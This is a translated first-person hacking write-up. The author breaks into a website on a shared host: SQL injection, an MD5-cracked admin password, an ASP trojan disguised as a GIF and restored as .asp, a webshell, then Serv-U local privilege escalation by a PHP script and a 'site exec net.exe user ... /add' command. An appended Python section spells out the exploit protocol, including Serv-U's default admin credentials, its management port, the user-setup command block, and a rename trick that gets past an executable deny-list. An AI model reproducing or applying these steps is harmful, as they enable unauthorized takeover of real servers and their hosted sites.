Serv-u.php: The Light in the Dark (vulnerability research)

Source: Internet
Author: User
Tags: ftp, php language, md5, md5 encryption, php script, sql injection
These days have been very boring, with nothing to do. A friend happened to have a new website and asked me to take a look, and while I was at it, to test the security of the site.
First I looked at the structure and layout of the site to get a feel for the site-wide program it used. After careful analysis I guessed it was probably FreePower 3.6, which I am quite familiar with, and the forum was LeadBBS. Having sized up the "enemy" this far, start!
Tip: it is important to collect information before you intrude; it helps you decide how the intrusion will proceed.
Pinging the target site gave its IP. Opening that IP in IE showed a different page, so it is probably a virtual host. Querying the IP at http://whois.webhosting.info showed 78 domain names bound to it. Good grief, that is a lot. I browsed the other sites: most are ASP sites, with a small number of PHP ones. Originally I wanted to attack across sites through one of the others, but my skill is not good enough and my foundations are not solid, so no way; change of plan.
I first found this link on the site:
Http://www.xxxxx.com/Article_Show.asp?ArticleID=7
It looked suspicious. Appending a semicolon brought up the error page, while replacing it with a period displayed the page normally, indicating a good chance of a SQL injection vulnerability, so I used a tool to inject. I opened NBSI2 and filled in the address of the injectable page; it reported that no injection vulnerability was detected. I then entered ID in the signature-character field and scanned again, and it reported that a vulnerability was found.
In turn it pulled out the user name and the MD5 hash of the password; running the MD5 through a cracker gave the password KIGNPL.
Because there was a ready-made admin address on the home page, it saved me the trouble of looking for it. I went straight into the back end and began trying to upload my ASP trojan, looking carefully at each function. Although the upload in file management could not be used, the one in article management could. Locally I first renamed the 2005 edition of the Haiyang ASP trojan to a GIF file, then uploaded it through article management. After it told me the upload had succeeded, the file's relative address was "uploadfiles/2005-2/2005217193345303.gif". But how do I turn that into an ASP file? I was stuck again; depressing! Suddenly I remembered that Yu Yi had described in Hacker Defence the method of using the database backup/restore function to deal with Dvbbs installations that will not allow ASP uploads, just what I needed! I immediately found the database management section and "restored" the GIF file I had uploaded as an ASP file.
The trojan address is http://www.xxxxx.com/database/8.asp. Finally a little sense of achievement, hehe. I logged into my lovely ASP trojan and got a webshell. A rough look at the host information: IIS 6.0, Windows Server 2003, and fortunately FSO is supported. I was over the moon; you should know, this was my first time!
Small knowledge: FSO (FileSystemObject) is Microsoft's ASP control for file operations; it can read, create, modify and delete directories and files, and is a very useful control in ASP programming.
I originally wanted to stop there, but having seen others elevate privileges in the magazine, I wanted to join in the fun too. After browsing for a while in the webshell, I found that when I browsed the C: drive of this site, permissions really had been restricted.
I had not expected the host to have only 3 drives, and I could not browse their root directories; I was confined to the site's home directory and could not move up. The administrator had also disabled WSH. Because I was the Internet Guest account with only user permissions, I held on to a glimmer of hope and tried cmd, but it could not be executed; it seems the administrator had locked down cmd.exe. No cmd, no WSH, and no execute permission on the directory. How am I supposed to get anywhere...
In a depressed mood I then tried uploading, thinking: you won't let me use cmd, so I'll upload my own! Still failed! I renamed the local cmd.exe to 1.gif and uploaded it; no good. Changed it to an HTM file; same, no good! Frustrated. It seems that no program can be run at all! I really wanted to give up: I could not write files, could not read files outside the directory, the methods of earlier masters were all dead ends, a reverse connection was useless, never mind NC and trojans.
Right, we haven't checked the ports yet! I hurriedly pulled out SuperScan to scan the ports, and the result drove this newbie to despair: only ports 21 and 389 were open. Presumably the other side has a firewall or has set up TCP/IP filtering. Port 389 was unfamiliar to me; 21 is the default port of the FTP service. Connect and see what the banner says? Maybe it's Serv-U?

Judging from the information returned, although the banner of the FTP server has been modified, from the phrase "User name okay, need password" one can boldly guess that it is Serv-U! Although I do not yet know its version, this may be a way to success; try it!
After careful thought there were two ways to go. The first is to penetrate through another site on this IP; I do not believe all 77 virtual hosts are that perverse, and some should have user rights that can be expanded. But easier said than done: after hacking away at all of them, by the next day I was a national treasure with two black eyes. The second is Serv-U: isn't port 21 open? So I picked up the ancestral remote overflow attack weapons and bombarded it with them in turn, but the other side's port 21 stood solid as rock. Despair...
Thinking back: doesn't the server support PHP scripts (there are PHP sites on this IP)? Although my permissions are small, they are not useless; I can't upload an exe, but a PHP file, who knows, might be interpreted normally! I quickly uploaded a PHP trojan, but the PHP trojan's permissions were also very low, with hardly any more useful permissions than the ASP trojan. But it gave me an idea: what if a PHP script could perform Serv-U's local privilege elevation? Said and done. But I cannot write PHP and could not make one myself, so I searched the Internet, but unfortunately found nothing suitable. Later I mentioned this idea to Yu Yi, and he said he happened to have such a script. I took it back and looked at it, and wasn't this exactly what I wanted? Haha, looks like it is a go.
I quickly uploaded it to the web directory; the address is http://www.xxxxx.com/database/servu.php (I renamed it to servu.php here). Run it directly in IE.

We just add a superuser in Serv-U! About its usage: Host IP is the server address provided by the virtual host; the host FTP management port should be modified according to the situation; the user name and password to add are wofeiwo's own preference, left at the default here, with password wrsky; the home directory of the new user is generally c:\. The others generally do not need to be modified.
OK, I modified the IP according to my situation, added the user name and password, and clicked the Add button. The Serv-U local privilege elevation script is then interpreted and executed on the server side; this takes some time and is a bit slow. After the progress bar finished it had executed successfully and added a Serv-U user Admim with password Admim and System permissions. The box shows the echo of the command execution; my echo was as follows (you can see from the information that it basically executed successfully):
Serv-u FTP Server v5.2 for WinSock ready ...
331 User name Okay, need password.
230 User logged in, proceed.
230-switching to SYSTEM Maintenance mode.
230 Version=1
900-type=status
900 Server=online
900-type=license
900-daysleft=0
......
900 minorversion=0
200-user=admim
User Settings saved

Note here: because I had no way of seeing which ports are really open behind the firewall (if there is one) (my skill is too poor, hehe), I simply assumed that its local Serv-U management port had not been modified; a bit of a gamble. Haha! It worked! It is Serv-U 5.2; even the version was displayed! A lucky result!
Now the situation is clear: log in directly via FTP, switch directory to System32, and then execute the following command to add the user mdj: quote site exec net.exe user mdj 123456 /add
What's going on? It told me the execution failed:
ftp> quote site exec net.exe user mdj 123456 /add
501 Cannot EXEC command line (error=0)
I thought for a moment: since net.exe exists, the administrator may have restricted access to the net file; testing cmd gave the same result. So I uploaded net.exe, renamed it 200.exe, and then executed the add-admin-user command.
Command execution succeeded! That means I have system administrator privileges! I can use Serv-U for remote management, upload trojans, and so on. Everyone here is an expert, so this newbie will not waste words; the infiltration ends here.
serv-u.php is a local privilege elevation tool for all Serv-U versions. I had only a small user's privileges, and it clearly played a crucial role in this infiltration. Some servers today still allow programs to execute; on those, uploading a Serv-U privilege-elevation exe settles everything! But if you are in a web test like mine, try this script; there may be a surprise! Finally, thanks to Yu Yi Brother for his strong support!
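As an added example (not code from the original write-up or from the servu.php script itself), here is a Python model of the two exchanges described above: the session on the local management port in which the script logs in as Serv-U's built-in local administrator and pushes a new System-level user, and the later FTP login as that user which issues SITE EXEC. The server side is a constructed stand-in that knows only the commands used here; its reply strings, the admim/mdj sample accounts and the deny-list of blocked executables are made-up demo data. The local admin account name, password and port 43958 are the defaults Serv-U 3.x-6.x shipped with, which the write-up itself never spells out; on a server where the administrator changed them, or where the web-server process cannot reach port 43958, the first session stops at the PASS step with a 530, which is the gamble the author mentions above.

```python
# Added example, not the write-up's or servu.php's code: the fake server, sample accounts and deny-list are constructed.
import socket
import threading

LOCAL_ADMIN_PORT = 43958                 # Serv-U 3.x-6.x default local management port (not named in the write-up)
LOCAL_ADMIN_USER = "LocalAdministrator"  # built-in local admin account, same versions
LOCAL_ADMIN_PASS = "#l@$ak#.lk;0@P"     # its fixed default password

def build_add_user_commands(user, password, home_dir="c:\\"):
    # Setup block sent after SITE MAINTENANCE: System maintenance rights, full access incl. P (execute).
    return ["-SETUSERSETUP", "-IP=0.0.0.0", f"-PortNo={LOCAL_ADMIN_PORT}",
            f"-User={user}", f"-Password={password}", f"-HomeDir={home_dir}",
            "-Maintenance=System", f" Access={home_dir}|RWAMELCDP"]

def _send(sock, line):
    sock.sendall((line + "\r\n").encode())

def _reply(rf):
    """Read one FTP reply; a multi-line reply ('nnn-...') ends at 'nnn '."""
    lines = []
    while not lines or not (lines[-1][:3].isdigit() and lines[-1][3:4] == " "):
        raw = rf.readline()
        if not raw:
            raise ConnectionError("control channel closed")
        lines.append(raw.rstrip("\r\n"))
    return lines

def fake_servu(sock, users, blocked_exes):
    """Constructed Serv-U stand-in. users: name -> (password, maintenance level); blocked_exes: admin's deny-list."""
    with sock, sock.makefile("r", encoding="utf-8", newline="\r\n") as rf:
        _send(sock, "220 Serv-U FTP Server v5.2 for WinSock ready...")
        pending, session, setup = None, {}, None
        for raw in rf:
            line = raw.rstrip("\r\n")
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                pending, session = arg, {}
                _send(sock, "331 User name okay, need password.")
            elif cmd.upper() == "PASS":
                pw, maint = users.get(pending, (None, None))
                session = {"user": pending, "maint": maint} if pw == arg else {}
                _send(sock, "230 User logged in, proceed." if session else "530 Not logged in.")
            elif line.upper() == "SITE MAINTENANCE":
                setup = {} if session.get("maint") == "System" else None
                _send(sock, "230-Switching to SYSTEM Maintenance mode.\r\n230 Version=1"
                      if setup is not None else "530 Permission denied.")
            elif setup is not None and line.startswith("-"):
                key, _, val = line[1:].partition("=")
                setup[key] = val                      # collected; no reply until the ' Access=' line
            elif setup is not None and line.startswith(" Access="):
                users[setup["User"]] = (setup["Password"], setup.get("Maintenance", "None"))
                _send(sock, f"200-User={setup['User']}\r\n200 User settings saved")
                setup = None
            elif cmd.upper() == "SITE" and arg.upper().startswith("EXEC "):
                _send(sock, "530 Not logged in." if "user" not in session else
                      "501 Cannot EXEC command line (error=0)"       # the error the write-up ran into
                      if arg.split()[1].lower() in blocked_exes else "200 EXEC command successful")
            else:
                _send(sock, "500 Unknown command")

def _login(sock, rf, user, password):
    transcript = [_reply(rf)]                          # banner, then USER/PASS
    for cmd in (f"USER {user}", f"PASS {password}"):
        _send(sock, cmd)
        transcript.append(_reply(rf))
    return transcript

def add_servu_user(sock, new_user, new_pass, admin_pass=LOCAL_ADMIN_PASS):
    """servu.php's job: log in as the built-in admin and push a new user. Returns (ok, transcript)."""
    with sock.makefile("r", encoding="utf-8", newline="\r\n") as rf:
        transcript = _login(sock, rf, LOCAL_ADMIN_USER, admin_pass)
        if transcript[-1][-1].startswith("230"):
            _send(sock, "SITE MAINTENANCE")
            transcript.append(_reply(rf))
        if transcript[-1][-1].startswith("230"):       # now in maintenance mode
            setup = build_add_user_commands(new_user, new_pass)
            sock.sendall("".join(c + "\r\n" for c in setup).encode())
            transcript.append(_reply(rf))
        return transcript[-1][-1].startswith("200"), transcript

def site_exec(sock, user, password, command_line):
    with sock.makefile("r", encoding="utf-8", newline="\r\n") as rf:
        last = _login(sock, rf, user, password)[-1][-1]
        if last.startswith("230"):
            _send(sock, f"SITE EXEC {command_line}")   # e.g. net.exe user mdj 123456 /add
            last = _reply(rf)[-1]
        return last                                    # the server's final reply line

def run_scenario(new_user="admim", new_pass="admim", admin_pass=LOCAL_ADMIN_PASS):
    # The write-up's three sessions against one shared fake server state.
    users = {LOCAL_ADMIN_USER: (LOCAL_ADMIN_PASS, "System")}
    blocked = {"net.exe", "cmd.exe"}                   # constructed admin deny-list
    def session(client):                               # one control connection each
        ours, theirs = socket.socketpair()
        threading.Thread(target=fake_servu, args=(theirs, users, blocked), daemon=True).start()
        with ours:
            return client(ours)
    added, _ = session(lambda s: add_servu_user(s, new_user, new_pass, admin_pass))
    run = lambda c: session(lambda s: site_exec(s, new_user, new_pass, c))
    return {"added": added, "denied": run("net.exe user mdj 123456 /add"),
            "allowed": run("200.exe user mdj 123456 /add")}   # blocked name vs renamed copy
```

Calling run_scenario() reproduces the outcome described above: the admin login and SITE MAINTENANCE succeed, SITE EXEC net.exe returns the 501 the author saw, and the same command against the renamed 200.exe copy returns 200, because the deny-list matches on the executable's name rather than its contents. run_scenario(admin_pass="wrong") shows the failure mode the author gambled on: nothing past the 530 at PASS, and the new user is never created.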
